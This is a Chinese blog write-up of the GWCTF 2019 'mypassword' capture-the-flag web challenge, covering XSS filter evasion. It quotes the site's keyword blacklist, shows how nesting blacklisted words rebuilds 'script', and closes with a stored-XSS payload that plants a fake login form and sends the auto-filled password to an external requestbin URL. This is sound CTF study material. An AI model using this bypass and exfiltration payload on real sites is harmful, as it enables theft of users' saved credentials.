[GWCTF 2019]mypassword XSS

最新推荐文章于 2023-03-01 19:50:14 发布
最新推荐文章于 2023-03-01 19:50:14 发布
阅读量398 收藏 1
点赞数
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/125404121
版权

放假后的第一个题目,感觉思维有点跟不上了,应该还是自己太菜

随机登录一个账号进去,看到提示说不能注入,那我偏要试试

可以看到Feedback是一个留言板,然后List会显示留言的内容,感觉像是二次注入,不管了先试试

12!@#$%^&*()__{}|":<>?select union

先将符号全部留言一遍

可以发现还是存在着一些过滤的

 

发现输入了1^1并没有执行,可能一开始只是显示一下,并没有存入数据库呢?于是赶紧再尝试一个列子观察输入的1^1是否会被SQL语句执行出来

结果发现依然没有……只能看看别的地方了,一开始提示到源码泄露

if(is_array($feedback)){
    echo "<script>alert('反馈不合法');</script>";
    return false;
}
$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
foreach ($blacklist as $val) {
    while(true){
        if(stripos($feedback,$val) !== false){
            $feedback = str_ireplace($val,"",$feedback);
        }else{
            break;
        }
    }
}

 发现黑名单都是js的内容,于是这时候有一个念头冒出来了,是不是可能是XSS?之前见过几次但是很生,没怎么做过,于是尝试着在留言框输入一个

<scriphostt>alert(1);</scriphostt>

 这样写的原因是因为script被过滤掉了,但是经过测试可以利用黑名单为空来进行绕过

输入scriphostt
过滤取空后就会变为 script

实现成功

 

但是不知道flag在哪里啊,经过查找可以发现在登录见面有一个源码js

 

if (document.cookie && document.cookie != '') {
    var cookies = document.cookie.split('; ');#以;为标志切分cookie,分类
    var cookie = {};
	for (var i = 0; i < cookies.length; i++) {
        var arr = cookies[i].split('=');#以=为标志切分cookies,键值分开
        var key = arr[0];#键
        cookie[key] = arr[1];#值
    }
	if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
        document.getElementsByName("username")[0].value = cookie['user'];
        document.getElementsByName("password")[0].value = cookie['psw'];
    }
}

 根据所写注释可以知道js内容就是一个保存密码的机制

我们要获得的秘密就在 document.getElementsByName("password")[0].value里面

但是要怎么获得呢,只能看wp了,我的能力只能到此了

根据许多大佬的博客总结,这里利用到了一个XSS平台,他会给你一个url,然后会收集所有对于该url请求的报文分析RequestBin — Collect, inspect and debug HTTP requests and webhooks

根据F12对于登录框的分析

我们可以自己伪造一个简易的登录框,这里注意input也被过滤了,因此可以任意用一个黑名单元素来进行取空进行绕过 

这里不要忘了要加上

否则密码没进去 

<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
    var psw = docucookiement.getcookieElementsByName("password")[0].value;
    docucookiement.locacookietion="http://http.requestbin.buuoj.cn/1hz5nj21/?a="+psw;
</scrcookieipt>

将密码发到平台所给网址上面

等一会儿就可以看到请求

 

-栀蓝-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[BUUCTF][GWCTF 2019]mypassword
m0_52587327的博客
04-26 301
文章目录知识点解题过程学习参考 知识点 csrf requestbin使用(外带数据,即命令注入无回显时如何得到执行结果) 解题过程 注册登录 这里加载了一个js文件 payload: 60d487b4-04d2-4e33-9aad-fbe0264c5ac6.node3.buuoj.cn**/js/login.js** 得到一串js代码 if (document.cookie && document.cookie != '') { var cookies = document.coo
MyPassword
04-08
在MyPassword的压缩包文件中,我们看到只有一个名为"MyPassword"的文件,这通常意味着它可能是一个自包含的应用程序,包含了所有必要的运行库和资源。用户只需双击这个文件,就能启动密码管理器,开始管理和保护自己...
[GWCTF 2019]mypassword
qq_43801002的博客
04-26 1541
#题目: 三个界面,注册界面源代码毛都没有,登录界面源代码里面有东西 if (document.cookie && document.cookie != '') { var cookies = document.cookie.split('; '); var cookie = {}; for (var i = 0; i < cookies.length; i++)...
BUUCTF:[GWCTF 2019]mypassword
末初的CSDN博客
04-06 2026
注册登录 这里加载了一个js文件 60d487b4-04d2-4e33-9aad-fbe0264c5ac6.node3.buuoj.cn/js/login.js if (document.cookie && document.cookie != '') { var cookies = document.cookie.split('; '); var cookie = {};...
【代码审计】buu_[GWCTF 2019]mypassword
serendipity1130的博客
06-09 560
1.页面打开像是注入,现注册登录后发现并非注入,如下:2.在登陆界面发现./js/login.js,打开查看到如下的js代码: 代码解读:代码会把cookie中的username和password填进当前表单思路:由于是后端执行js,所以构造js即可。先写一个有表单的页面,调用这个js文件,cookie中的数据被填入表单,再用js获取页面表单内容,发送请求,就能得到管理员cookie。现在看在哪里以及如何发送请求。3.由于在各页面查看源码,在首页发现feedback.php:打开其源码可看到注释:代码分
mypassword.zip
05-18
【标题】"mypassword.zip" 是一个包含了与微信小程序开发相关的资源文件的压缩包,它可能包含源代码、配置文件以及必要的图片或字体资源。这个小程序的开发利用了云数据库技术,提供了一个基础的密码管理功能,适用...
MyPassword:安卓
04-30
【压缩包子文件的文件名称列表】"MyPassword-master" 告诉我们这是一个Git仓库的主分支(master分支)的下载,通常包含了项目的源代码、资源文件、构建脚本和其他相关材料。在这样的目录结构下,我们可以期待找到...
mypassword2.zip
05-21
"mypassword2.zip" 中的文件很可能采用了此类加密技术。 4. **多平台支持**:现代密码管理器通常跨平台,支持Windows、MacOS、iOS和Android等操作系统,以便用户在不同设备上都能访问其密码库。 5. **备份与恢复**...
MyPassword:为您生成和管理密码的 Android 应用
06-29
在技术实现上,MyPassword 很可能基于Java语言开发,因为标签中明确提到了"Java"。Java是Android应用开发的主流语言,具有跨平台性、稳定性和丰富的库支持。开发者可能利用了Android SDK中的各种组件和服务,如...
BUUCTF__[GWCTF 2019]mypassword_题解
风过江南乱的博客
04-29 880
BUUCTF__[GWCTF 2019]mypassword_题解 XSS获取admin cookie
BUUCTF--[GWCTF 2019]mypassword
qq_46263951的博客
07-26 671
<!-- if(is_array($feedback)){ echo "<script>alert('反馈不合法');</script>"; return false; } $blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onlo...
[GWCTF 2019]mypassword-做题记录
cjdgg的博客
03-13 407
[GWCTF 2019]mypassword-做题思路学习 这题给了个朴实无华的登陆界面,有注册登录界面那肯定得试试sql注入,很遗憾没有试出来。 那就找找源代码看看有没有有价值的东西 只发现加载了一个login.gs,emem还是没发现有什么能用的,没办法那就注册一个号登录进去看看吧 登录进去主页面会有你的用户名可控,我就想会不会有啥ssti或者搞些标签进去,结果可想而知,<,>,{,},’,"这些符号应该被过滤了,那这题就不是这么玩的 去看看别的页面,feedback.php这里应
buu刷题(第一周)
qq_62046696的博客
03-01 788
create_function直接执行,里面是有eval所以需要让create_function的函数名()引用一下来执行,下面的是不可能爆破成功了,然后create_function()这个函数的漏洞,他create之后会自动生成一个函数名为%00lambda_[0-999]我们可以爆破。
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3271
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
[GWCTF 2019]枯燥的抽奖
06-30 101
查看源代码发现,输入框中的内容提交给check.php,输入check.php发现可以查看源码。 fSFdLI1f9Y <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); session_start(); if(!isset($_SESSION['seed'])){ $_SESSION['seed']=rand(0,999999999); } mt_srand($_SESSION['seed'...
IDENTIFIED BY mypassword WITH GRANT OPTION语法错误
最新发布
06-09
如果您在使用MySQL创建用户并授权时遇到了IDENTIFIED BY mypassword WITH GRANT OPTION语法错误,可能是因为您的语法格式不正确。正确的语法格式应该是: ``` CREATE USER 'username'@'localhost' IDENTIFIED BY 'password'; GRANT ALL PRIVILEGES ON *.* TO 'username'@'localhost' WITH GRANT OPTION; ``` 在这个语法中,'username' 是您要创建的用户名,'password' 是该用户的密码。使用GRANT ALL PRIVILEGES ON *.*授权该用户对所有数据库和表进行操作,并且WITH GRANT OPTION选项允许该用户授权其它用户。请注意,这里的localhost是指该用户只能从本地访问MySQL。如果您希望该用户可以从远程访问MySQL,请将'localhost'替换为'%' 如果您仍然遇到问题,请检查您的语法格式是否正确,并确保您具有足够的权限来创建用户和授权访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值